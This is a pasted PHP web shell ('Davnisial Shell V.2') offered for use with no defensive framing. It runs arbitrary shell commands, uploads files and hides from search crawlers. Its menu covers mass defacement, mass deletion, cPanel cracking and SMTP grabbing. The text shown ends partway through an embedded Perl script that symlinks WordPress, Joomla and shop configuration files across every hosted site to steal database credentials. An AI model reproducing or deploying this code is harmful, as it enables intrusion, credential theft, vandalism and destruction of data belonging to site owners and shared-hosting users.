Guest User

davnisial shell

a guest
Mar 13th, 2018
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 110.23 KB | None | 0 0
  1. <?php
  2. $auth_pass = "d489a3289ecdc847cb67f7a480e6f9fa"; // default: kontol
  3. session_start();
  4. error_reporting(0);
  5. set_time_limit(0);
  6. @set_magic_quotes_runtime(0);
  7. @clearstatcache();
  8. @ini_set('error_log',NULL);
  9. @ini_set('log_errors',0);
  10. @ini_set('max_execution_time',0);
  11. @ini_set('output_buffering',0);
  12. @ini_set('display_errors', 0);
  13.  
  14.  
  15. $color = "#00ff00";
  16. $default_action = 'FilesMan';
  17. $default_use_ajax = true;
  18. $default_charset = 'UTF-8';
  19. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  20. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  21. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  22. header('HTTP/1.0 404 Not Found');
  23. exit;
  24. }
  25. }
  26.  
  27. function login_shell() {
  28. ?>
  29. <html>
  30. <body><body> <script> alert(' Silahkan Login Terlebih Dahulu ^_^ ') </script></body>
  31. <head>
  32. <title>DavnisiaL</title>
  33. <link href='https://thecryptoshow.com/wp-content/uploads/2017/11/fatcom-1.ico' rel='icon' type='image/x-icon'/>
  34. <style type="text/css">
  35. body {
  36. background-color: #000000;
  37. background-image: url(http://boot.cncorp.co.id/an.jpg);
  38. <!--http://boot.cncorp.co.id/an.jpg-->
  39. margin-left: 0px;
  40. margin-top: 0px;
  41. margin-right: 0px;
  42. margin-bottom: 0px;
  43. background-position:right top;
  44. background-repeat:no-repeat;
  45. background-size:100%
  46. }
  47. html {
  48. background:#387c6c;
  49. -webkit-background-size: cover;
  50. -moz-background-size: cover;
  51. -o-background-size: cover;
  52. background-size: cover;
  53. }
  54. html,body{margin:0;padding:0;height:100%;font:10px Arial;}
  55. #wrapper{min-height:100%;position:relative;}
  56. #header{background:#ff0000;padding:5px;height:50px;color:#3000ff;}
  57. #body{padding-bottom:40px;padding-left:10px;}
  58. #footer{background:#ff0000;position:absolute;bottom:0;width:100%;
  59. text-align:center;color:#408080;}
  60. header {
  61. color: ;
  62. margin: 10px auto;
  63. }
  64.  
  65. </style>
  66. </head>
  67.  
  68. <center>
  69. <font face="monospace" size='3' color='cyan'><br>
  70.  
  71.  
  72. <header>
  73. <pre>
  74. </pre>
  75. </header>
  76. <br><br><br><br><br><br><br><br>
  77. <fieldset>
  78. <label for="login">Username</label>
  79. <form method="post">
  80. <input type="text" name="id" value="Davnisial">
  81. </form>
  82. Password
  83. <form method="post">
  84. <input type="password" name="pass"> <br><br>
  85. <input type="submit" value="Login">
  86. </fieldset>
  87. </form>
  88. <style>
  89. </style>
  90. </head>
  91. <body>
  92.  
  93. </font>
  94. </body>
  95. </head>
  96. <table border="0" cellspacing="1" cellpadding="4" class="tborder"><tr><td class="thead"><strong></strong></td></tr><tr><td class="trow1"></a></td></tr></table><br />
  97. <table border="0" cellspacing="1" cellpadding="4" class="tborder">
  98. <tbody><tr>
  99. <?php
  100. exit;
  101. }
  102. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  103. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  104. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  105. else
  106. login_shell();
  107. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  108. @ob_clean();
  109. $file = $_GET['file'];
  110. header('Content-Description: File Transfer');
  111. header('Content-Type: application/octet-stream');
  112. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  113. header('Expires: 0');
  114. header('Cache-Control: must-revalidate');
  115. header('Pragma: public');
  116. header('Content-Length: ' . filesize($file));
  117. readfile($file);
  118. exit;
  119. }
  120. ?>
  121. <html>
  122. <head>
  123. <title>Davnisial Shell V.2</title>
  124. <meta name='author' content='Recode IndoXploit'>
  125. <meta charset="UTF-8">
  126. <link href='https://thecryptoshow.com/wp-content/uploads/2017/11/fatcom-1.ico' rel='icon' type='image/x-icon'/>
  127. <style type='text/css'>
  128. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  129. html {
  130. background: #2d4746;
  131. color: #00ffe9;
  132. font-family: 'Share Tech Mono';
  133. font-size: 12px;
  134. width: 100%;
  135. }
  136. li {
  137. display: inline;
  138. margin: 1px;
  139. padding: 1px;
  140. }
  141.  
  142. #menu{
  143. background:#2D4746;
  144. margin:9px 3px 4px 2px;
  145. }
  146. #menu a{
  147. padding:4px 19px;
  148. margin:0;
  149. background:#3b5653;
  150. text-decoration:none;
  151. letter-spacing:2px;
  152. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  153.  
  154. }
  155. #menu a:hover{
  156. background:#3b5653;
  157. border-bottom:1px solid #4a7a75;
  158. border-top:1px solid #4a7a75;
  159. }
  160. .explore tr:hover{background:#3b5653}
  161. table tr:first-child{
  162. background: #619996;
  163. text-align: center;
  164. color: white;
  165. }
  166. table, th, td {
  167. border-collapse:collapse;
  168. font-family: Tahoma, Geneva, sans-serif;
  169. background: transparent;
  170. font-family: 'Share Tech Mono';
  171. font-size: 13px;
  172. }
  173. .table_home, .th_home, .td_home {
  174. border: 1px solid #619996;
  175. }
  176. th {
  177. padding: 10px;
  178. }
  179. a {
  180. color: #00ffe9;
  181. text-decoration: none;
  182. }
  183. a:hover {
  184. color: red;
  185. text-decoration: underline;
  186. }
  187. b {
  188. color: white;
  189. }
  190. input[type=text], input[type=password],input[type=submit] {
  191. background: transparent;
  192. color: #00ffe9;
  193. border: 1px solid #00ffe9;
  194. margin: 5px auto;
  195. padding-left: 5px;
  196. font-family: 'Share Tech Mono';
  197. font-size: 13px;
  198. }
  199. input[type=submit] {
  200. background: #619996;
  201. color: #00ffe9;
  202. border: 1px solid #00ffe9;
  203. margin: 5px auto;
  204. padding-left: 5px;
  205. font-family: 'Share Tech Mono';
  206. font-size: 13px;
  207. cursor:pointer;
  208. }
  209. textarea {
  210. border: 1px solid #00ffe9;
  211. width: 100%;
  212. height: 400px;
  213. padding-left: 5px;
  214. margin: 10px auto;
  215. resize: none;
  216. background: transparent;
  217. color: #ffffff;
  218. font-family: 'Share Tech Mono';
  219. font-size: 13px;
  220. }
  221. select {
  222. width: 152px;
  223. background: #435651;
  224. color: white;
  225. border: 1px solid #00ffe9;
  226. margin: 5px auto;
  227. padding-left: 5px;
  228. font-family: 'Share Tech Mono';
  229. font-size: 13px;
  230. }
  231. option:hover {
  232. background: white;
  233. color: #435651;
  234. }
  235. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  236. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  237. .infoweb {
  238. border-right: 1px solid #00FFFF;
  239. }
  240. </style>
  241. </head>
  242. <?php
  243. ###############################################################################
  244. // Mngganti Copyright tidak akan menjadikan anda sebagai programer
  245. ###############################################################################
  246. function w($dir,$perm) {
  247. if(!is_writable($dir)) {
  248. return "<font color=red>".$perm."</font>";
  249. } else {
  250. return "<font color=white>".$perm."</font>";
  251. }
  252. }
  253. function r($dir,$perm) {
  254. if(!is_readable($dir)) {
  255. return "<font color=red>".$perm."</font>";
  256. } else {
  257. return "<font color=white>".$perm."</font>";
  258. }
  259. }
  260. function exe($cmd) {
  261. if(function_exists('system')) {
  262. @ob_start();
  263. @system($cmd);
  264. $buff = @ob_get_contents();
  265. @ob_end_clean();
  266. return $buff;
  267. } elseif(function_exists('exec')) {
  268. @exec($cmd,$results);
  269. $buff = "";
  270. foreach($results as $result) {
  271. $buff .= $result;
  272. } return $buff;
  273. } elseif(function_exists('passthru')) {
  274. @ob_start();
  275. @passthru($cmd);
  276. $buff = @ob_get_contents();
  277. @ob_end_clean();
  278. return $buff;
  279. } elseif(function_exists('shell_exec')) {
  280. $buff = @shell_exec($cmd);
  281. return $buff;
  282. }
  283. }
  284. function perms($file){
  285. $perms = fileperms($file);
  286. if (($perms & 0xC000) == 0xC000) {
  287. // Socket
  288. $info = 's';
  289. } elseif (($perms & 0xA000) == 0xA000) {
  290. // Symbolic Link
  291. $info = 'l';
  292. } elseif (($perms & 0x8000) == 0x8000) {
  293. // Regular
  294. $info = '-';
  295. } elseif (($perms & 0x6000) == 0x6000) {
  296. // Block special
  297. $info = 'b';
  298. } elseif (($perms & 0x4000) == 0x4000) {
  299. // Directory
  300. $info = 'd';
  301. } elseif (($perms & 0x2000) == 0x2000) {
  302. // Character special
  303. $info = 'c';
  304. } elseif (($perms & 0x1000) == 0x1000) {
  305. // FIFO pipe
  306. $info = 'p';
  307. } else {
  308. // Unknown
  309. $info = 'u';
  310. }
  311. // Owner
  312. $info .= (($perms & 0x0100) ? 'r' : '-');
  313. $info .= (($perms & 0x0080) ? 'w' : '-');
  314. $info .= (($perms & 0x0040) ?
  315. (($perms & 0x0800) ? 's' : 'x' ) :
  316. (($perms & 0x0800) ? 'S' : '-'));
  317. // Group
  318. $info .= (($perms & 0x0020) ? 'r' : '-');
  319. $info .= (($perms & 0x0010) ? 'w' : '-');
  320. $info .= (($perms & 0x0008) ?
  321. (($perms & 0x0400) ? 's' : 'x' ) :
  322. (($perms & 0x0400) ? 'S' : '-'));
  323. // World
  324. $info .= (($perms & 0x0004) ? 'r' : '-');
  325. $info .= (($perms & 0x0002) ? 'w' : '-');
  326. $info .= (($perms & 0x0001) ?
  327. (($perms & 0x0200) ? 't' : 'x' ) :
  328. (($perms & 0x0200) ? 'T' : '-'));
  329. return $info;
  330. }
  331. function hdd($s) {
  332. if($s >= 1073741824)
  333. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  334. elseif($s >= 1048576)
  335. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  336. elseif($s >= 1024)
  337. return sprintf('%1.2f',$s / 1024 ) .' KB';
  338. else
  339. return $s .' B';
  340. }
  341. function ambilKata($param, $kata1, $kata2){
  342. if(strpos($param, $kata1) === FALSE) return FALSE;
  343. if(strpos($param, $kata2) === FALSE) return FALSE;
  344. $start = strpos($param, $kata1) + strlen($kata1);
  345. $end = strpos($param, $kata2, $start);
  346. $return = substr($param, $start, $end - $start);
  347. return $return;
  348. }
  349. function getsource($url) {
  350. $curl = curl_init($url);
  351. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  352. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  353. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  354. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  355. $content = curl_exec($curl);
  356. curl_close($curl);
  357. return $content;
  358. }
  359. function bing($dork) {
  360. $npage = 1;
  361. $npages = 30000;
  362. $allLinks = array();
  363. $lll = array();
  364. while($npage <= $npages) {
  365. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  366. if($x) {
  367. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  368. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  369. $npage = $npage + 10;
  370. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  371. } else break;
  372. }
  373. $URLs = array();
  374. foreach($allLinks as $url){
  375. $exp = explode("/", $url);
  376. $URLs[] = $exp[2];
  377. }
  378. $array = array_filter($URLs);
  379. $array = array_unique($array);
  380. $sss = count(array_unique($array));
  381. foreach($array as $domain) {
  382. echo $domain."\n";
  383. }
  384. }
  385. function reverse($url) {
  386. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  387. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  388. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  389. curl_setopt($ch, CURLOPT_HEADER, 0);
  390. curl_setopt($ch, CURLOPT_POST, 1);
  391. $resp = curl_exec($ch);
  392. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  393. $array = explode(",,", $resp);
  394. unset($array[0]);
  395. foreach($array as $lnk) {
  396. $lnk = "http://$lnk";
  397. $lnk = str_replace(",", "", $lnk);
  398. echo $lnk."\n";
  399. ob_flush();
  400. flush();
  401. }
  402. curl_close($ch);
  403. }
  404. if(get_magic_quotes_gpc()) {
  405. function idx_ss($array) {
  406. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  407. }
  408. $_POST = idx_ss($_POST);
  409. $_COOKIE = idx_ss($_COOKIE);
  410. }
  411.  
  412. if(isset($_GET['dir'])) {
  413. $dir = $_GET['dir'];
  414. chdir($dir);
  415. } else {
  416. $dir = getcwd();
  417. }
  418. $kernel = php_uname();
  419. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  420. $dir = str_replace("\\","/",$dir);
  421. $scdir = explode("/", $dir);
  422. $freespace = hdd(disk_free_space("/"));
  423. $total = hdd(disk_total_space("/"));
  424. $used = $total - $freespace;
  425. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=white>OFF</font>";
  426. $ds = @ini_get("disable_functions");
  427. $mysql = (function_exists('mysql_connect')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  428. $curl = (function_exists('curl_version')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  429. $wget = (exe('wget --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  430. $perl = (exe('perl --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  431. $python = (exe('python --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  432. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=white>NONE</font>";
  433. if(!function_exists('posix_getegid')) {
  434. $user = @get_current_user();
  435. $uid = @getmyuid();
  436. $gid = @getmygid();
  437. $group = "?";
  438. } else {
  439. $uid = @posix_getpwuid(posix_geteuid());
  440. $gid = @posix_getgrgid(posix_getegid());
  441. $user = $uid['name'];
  442. $uid = $uid['uid'];
  443. $group = $gid['name'];
  444. $gid = $gid['gid'];
  445. }
  446. echo "System: <font color=white>".$kernel."</font><br>";
  447. echo "User: <font color=white>".$user."</font> (".$uid.") Group: <font color=white>".$group."</font> (".$gid.")<br>";
  448. echo "Server IP: <font color=white>".$ip."</font> | Your IP: <font color=white>".$_SERVER['REMOTE_ADDR']."</font><br>";
  449. echo "HDD: <font color=white>$used</font> / <font color=white>$total</font> ( Free: <font color=white>$freespace</font> )<br>";
  450. echo "Safe Mode: $sm<br>";
  451. echo "Disable Functions: $show_ds<br>";
  452. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  453. echo "Current DIR: ";
  454. foreach($scdir as $c_dir => $cdir) {
  455. echo "<a href='?dir=";
  456. for($i = 0; $i <= $c_dir; $i++) {
  457. echo $scdir[$i];
  458. if($i != $c_dir) {
  459. echo "/";
  460. }
  461. }
  462. echo "'>$cdir</a>/";
  463. }
  464.  
  465. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  466. echo "<hr>";
  467. echo "<center>";
  468. echo "<ul>";
  469. echo "<center><font size='6px' color='white'>Davnisial Tools</font>";
  470. echo "<center>Copyright &copy; ".date("Y")." - <a href='https://www.facebook.com/davnisial302/' target='_blank'><font color=red>Davnisial</font></a></center>";
  471. echo "<br>";
  472. echo "<br>";
  473. echo '<center><div id="menu">';
  474. echo "<li> <a href='?'>Home</a> </li>";
  475. echo "<li> <a href='?dir=$dir&do=upload'>Upload</a> </li>";
  476. echo "<li> <a href='?dir=$dir&do=cmd'>Command</a> </li>";
  477. echo "<li> <a href='?dir=$dir&do=mass_deface'>Mass Def</a> </li>";
  478. echo "<li> <a href='?dir=$dir&do=mass_delete'>Mass Del</a> </li>";
  479. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
  480. echo "<li> <a href='?dir=$dir&do=jumping'>Lompat Kodok</a> </li>";
  481. echo "<br><br><li> <a href='?dir=$dir&do=symlink'>Symlink</a> </li>";
  482. echo "<li> <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> </li>";
  483. echo "<li> <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> </li>";
  484. echo "<li> <a href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
  485. echo "<li> <a href='?dir=$dir&do=cgi'>CGI Telnet</a> </li>";
  486. echo "<li> <a href='?dir=$dir&do=network'>network</a> </li>";
  487. echo "<li> <a href='?dir=$dir&do=adminer'>Adminer</a> </li><br>";
  488. echo "<br><li> <a href='?dir=$dir&do=fake_root'>Fake Root</a> </li>";
  489. echo "<li> <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> </li>";
  490. echo "<li> <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> </li>";
  491. echo "<li> <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Def</a> </li>";
  492. echo "<li> <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Def2</a> </li>";
  493. echo "<br><br><li> <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> </li>";
  494. echo "<li> <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> </li>";
  495. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF Online</a> </li>";
  496. echo "<li> <a href='?xp=bypassmod'>Disable Function None</a> </li>";
  497. echo "<li> <a href='?dir=$dir&do=endec'>Script Encode & Decode</a> </li>";
  498. echo "<li> <a style='color: red;' href='?logout=true'>Logout</a> </li>";
  499. echo "</ul>";
  500. echo "</center>";
  501. echo "<hr>";
  502. if($_GET['logout'] == true) {
  503. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  504. echo "<script>window.location='?';</script>";
  505. } elseif($_GET['do'] == 'upload') {
  506. echo "<center>";
  507. if($_POST['upload']) {
  508. if($_POST['tipe_upload'] == 'biasa') {
  509. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  510. $act = "<font color=white>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  511. } else {
  512. $act = "<font color=red>failed to upload file</font>";
  513. }
  514. } else {
  515. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  516. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  517. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  518. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  519. $act = "<font color=white>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  520. } else {
  521. $act = "<font color=red>failed to upload file</font>";
  522. }
  523. } else {
  524. $act = "<font color=red>failed to upload file</font>";
  525. }
  526. }
  527. }
  528. echo "Upload File:
  529. <form method='post' enctype='multipart/form-data'>
  530. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  531. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  532. <input type='file' name='ix_file'>
  533. <input type='submit' value='upload' name='upload'>
  534. </form>";
  535. echo $act;
  536. echo "</center>";
  537. } elseif($_GET['do'] == 'cmd') {
  538. echo "<form method='post'>
  539. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  540. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  541. </form>";
  542. if($_POST['do_cmd']) {
  543. echo "<pre>".exe($_POST['cmd'])."</pre>";
  544. }
  545. } elseif($_GET['do'] == 'mass_deface') {
  546. function sabun_massal($dir,$namafile,$isi_script) {
  547. if(is_writable($dir)) {
  548. $dira = scandir($dir);
  549. foreach($dira as $dirb) {
  550. $dirc = "$dir/$dirb";
  551. $lokasi = $dirc.'/'.$namafile;
  552. if($dirb === '.') {
  553. file_put_contents($lokasi, $isi_script);
  554. } elseif($dirb === '..') {
  555. file_put_contents($lokasi, $isi_script);
  556. } else {
  557. if(is_dir($dirc)) {
  558. if(is_writable($dirc)) {
  559. echo "[<font color=white>DONE</font>] $lokasi<br>";
  560. file_put_contents($lokasi, $isi_script);
  561. $idx = sabun_massal($dirc,$namafile,$isi_script);
  562. }
  563. }
  564. }
  565. }
  566. }
  567. }
  568. function sabun_biasa($dir,$namafile,$isi_script) {
  569. if(is_writable($dir)) {
  570. $dira = scandir($dir);
  571. foreach($dira as $dirb) {
  572. $dirc = "$dir/$dirb";
  573. $lokasi = $dirc.'/'.$namafile;
  574. if($dirb === '.') {
  575. file_put_contents($lokasi, $isi_script);
  576. } elseif($dirb === '..') {
  577. file_put_contents($lokasi, $isi_script);
  578. } else {
  579. if(is_dir($dirc)) {
  580. if(is_writable($dirc)) {
  581. echo "[<font color=white>DONE</font>] $dirb/$namafile<br>";
  582. file_put_contents($lokasi, $isi_script);
  583. }
  584. }
  585. }
  586. }
  587. }
  588. }
  589. if($_POST['start']) {
  590. if($_POST['tipe_sabun'] == 'mahal') {
  591. echo "<div style='margin: 5px auto; padding: 5px'>";
  592. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  593. echo "</div>";
  594. } elseif($_POST['tipe_sabun'] == 'murah') {
  595. echo "<div style='margin: 5px auto; padding: 5px'>";
  596. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  597. echo "</div>";
  598. }
  599. } else {
  600. echo "<center>";
  601. echo "<form method='post'>
  602. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  603. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  604. <font style='text-decoration: underline;'>Folder:</font><br>
  605. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  606. <font style='text-decoration: underline;'>Filename:</font><br>
  607. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  608. <font style='text-decoration: underline;'>Index File:</font><br>
  609. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Davnisial</textarea><br>
  610. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  611. </form></center>";
  612. }
  613. } elseif($_GET['do'] == 'mass_delete') {
  614. function hapus_massal($dir,$namafile) {
  615. if(is_writable($dir)) {
  616. $dira = scandir($dir);
  617. foreach($dira as $dirb) {
  618. $dirc = "$dir/$dirb";
  619. $lokasi = $dirc.'/'.$namafile;
  620. if($dirb === '.') {
  621. if(file_exists("$dir/$namafile")) {
  622. unlink("$dir/$namafile");
  623. }
  624. } elseif($dirb === '..') {
  625. if(file_exists("".dirname($dir)."/$namafile")) {
  626. unlink("".dirname($dir)."/$namafile");
  627. }
  628. } else {
  629. if(is_dir($dirc)) {
  630. if(is_writable($dirc)) {
  631. if(file_exists($lokasi)) {
  632. echo "[<font color=white>DELETED</font>] $lokasi<br>";
  633. unlink($lokasi);
  634. $idx = hapus_massal($dirc,$namafile);
  635. }
  636. }
  637. }
  638. }
  639. }
  640. }
  641. }
  642. if($_POST['start']) {
  643. echo "<div style='margin: 5px auto; padding: 5px'>";
  644. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  645. echo "</div>";
  646. } else {
  647. echo "<center>";
  648. echo "<form method='post'>
  649. <font style='text-decoration: underline;'>Folder:</font><br>
  650. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  651. <font style='text-decoration: underline;'>Filename:</font><br>
  652. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  653. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  654. </form></center>";
  655. }
  656. } elseif($_GET['do'] == 'config') {
  657. $idx = mkdir("Dav_config", 0777);
  658. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
  659. $htc = fopen("Dav_config/.htaccess","w");
  660. fwrite($htc, $isi_htc);
  661. fclose($htc);
  662. if(preg_match("/vhosts|vhost/", $dir)) {
  663. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  664. $vhost = "#!/usr/bin/perl -I/usr/local/bandmin
opendir(my $dir , "/var/www/vhosts/");
foreach(sort readdir $dir) {
    my $isDir = 0;
    $isDir = 1 if -d $_;
$sitess = $_;


symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/configure.php',$sitess.'-shop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/os/includes/configure.php',$sitess.'-shop-os.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscom/includes/configure.php',$sitess.'-oscom.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerce/includes/configure.php',$sitess.'-oscommerce.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerces/includes/configure.php',$sitess.'-oscommerces.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/configure.php',$sitess.'-shop2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shopping/includes/configure.php',$sitess.'-shop-shopping.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sale/includes/configure.php',$sitess.'-sale.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/amember/config.inc.php',$sitess.'-amember.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.inc.php',$sitess.'-amember2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/members/configuration.php',$sitess.'-members.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/config.php',$sitess.'-forum.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/includes/config.php',$sitess.'-forums.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/conf.php',$sitess.'-5.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-4.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/WP/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/press/wp-config.php',$sitess.'-wp13-press.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/wp-config.php',$sitess.'-wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Wordpress/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/wp-config.php',$sitess.'-Wordpress-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/wp-config.php',$sitess.'-Wordpress-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress-blog.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress-beta.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blogs/wp-config.php',$sitess.'-Wordpress-blogs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/wp-config.php',$sitess.'-Wordpress-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/wp-config.php',$sitess.'-Wordpress-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/wp-config.php',$sitess.'-Wordpress-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/wp-config.php',$sitess.'-Wordpress-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/test/wp-config.php',$sitess.'-Wordpress-test.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joomla/configuration.php',$sitess.'-joomla2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/configuration.php',$sitess.'-joomla-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joo/configuration.php',$sitess.'-joo.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cms/configuration.php',$sitess.'-joomla-cms.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/configuration.php',$sitess.'-joomla-site.txt');
